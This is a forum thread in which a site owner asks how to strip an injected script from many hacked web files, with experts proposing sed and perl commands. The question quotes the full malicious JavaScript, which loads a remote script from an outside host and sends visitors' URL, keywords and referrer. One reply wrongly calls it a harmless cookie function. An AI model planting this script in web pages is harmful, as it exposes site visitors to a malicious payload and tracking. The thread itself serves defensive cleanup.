Solved

Remove a very long string from all files in Linux

Posted on 2016-11-10
6
97 Views
Last Modified: 2016-11-11
Dear Experts.

One of my friends has a website which apparently was hacked and a certain very very (VERY) long function was injected into many of his files.
While I can rather easily detect the files with said function, I do need help with an automated cleanup

I had the following idea.... All the files has the following string inside:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://freedomfitnessandworkout.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

when I nano the file, it all appears in one line, meaning I could probably somehow use grep to find the line number and ten somehow tell the system to remove said line from the file

Any idea how I'd go about doing such a thing?
0
Comment
Question by:David Sankovsky
6 Comments
 
LVL 62

Expert Comment

by:gheist
ID: 41882333
Restore from backup and never ever let webserver modify content?
0
 
LVL 28

Accepted Solution

by:
serialband earned 500 total points
ID: 41882680
If you don't want to spend time restoring, or if you don't have a backup, you could try sed.
sed '/pattern/d'  Matching_files*
The above command matches the pattern and deletes the entire line.

Assuming all lines have the link, you match this will match the string and delete the entire line.  This outputs to stdout:
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
To send it to another file
sed "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_file > new_file


If you want to do it inline and edit and replace the file, you add the inline option:
sed -i "/http:\/\/freedomfitnessandworkout.com\/js\/jquery.min.php/d'  Matching_files
0
 
LVL 77

Expert Comment

by:arnold
ID: 41882862
Sed -I is a better approach compared to the /d since the string might not be the dole item on the line.

perl -pi.bak -e '/pattern/replacementofany/g;' files
The -I.bal will create a backup file for each file that is modified.
The /g tells it to replace all instances of the string that might exist in the same line.
0
Comprehensive Backup Solutions for Microsoft

Acronis protects the complete Microsoft technology stack: Windows Server, Windows PC, laptop and Surface data; Microsoft business applications; Microsoft Hyper-V; Azure VMs; Microsoft Windows Server 2016; Microsoft Exchange 2016 and SQL Server 2016.

 
LVL 28

Expert Comment

by:serialband
ID: 41883250
@arnold
/d  is meant to delete the whole line if a pattern is matched, and that fits the question.  He's not trying to replace items, just delete the line.  You also talk about sed and used perl for your example.
0
 
LVL 77

Expert Comment

by:arnold
ID: 41883286
Serialband, I said that the sed -i was a better option versus /d
Verifying that the pattern is really in a single line,
The perl command line was provided as yet another option that does the same thing as the sed -I.bak if not will also create a bak file ..

To replace a pattern......

The entry seems to be a coldfusion object, might have had the person modified the template to add the above function to their site?
Seems like a cookie setting function.
I.e, the person attempts to make their site more user customizable...... So it requires cookies to maintain reference to the user/settings....
0
 
LVL 7

Author Closing Comment

by:David Sankovsky
ID: 41883740
Well, the SED command was almost perfect, you all however missed my main question, how would I go around sending all the matched file to whatever cleaning tool I chose (sed, perl, or whatever)

I eventually used "find" to make sure I don't accidently send folders into SED and then used XARGS to send all files in the web root directory to sed.

Thanks for all your help.
0

Featured Post

Three Reasons Why Backup is Strategic

Backup is strategic to your business because your data is strategic to your business. Without backup, your business will fail. This white paper explains why it is vital for you to design and immediately execute a backup strategy to protect 100 percent of your data.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This is the error message I got (CODE) Error caused by incompatible libmp3lame 3.98-2 with ffmpeg I've googled this error message and found out sometimes it attaches this note "can be treated with downgrade libmp3lame to version 3.97 or 3.98" …
Network Interface Card (NIC) bonding, also known as link aggregation, NIC teaming and trunking, is an important concept to understand and implement in any environment where high availability is of concern. Using this feature, a server administrator …
Learn how to find files with the shell using the find and locate commands. Use locate to find a needle in a haystack.: With locate, check if the file still exists.: Use find to get the actual location of the file.:
Connecting to an Amazon Linux EC2 Instance from Windows Using PuTTY.

776 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question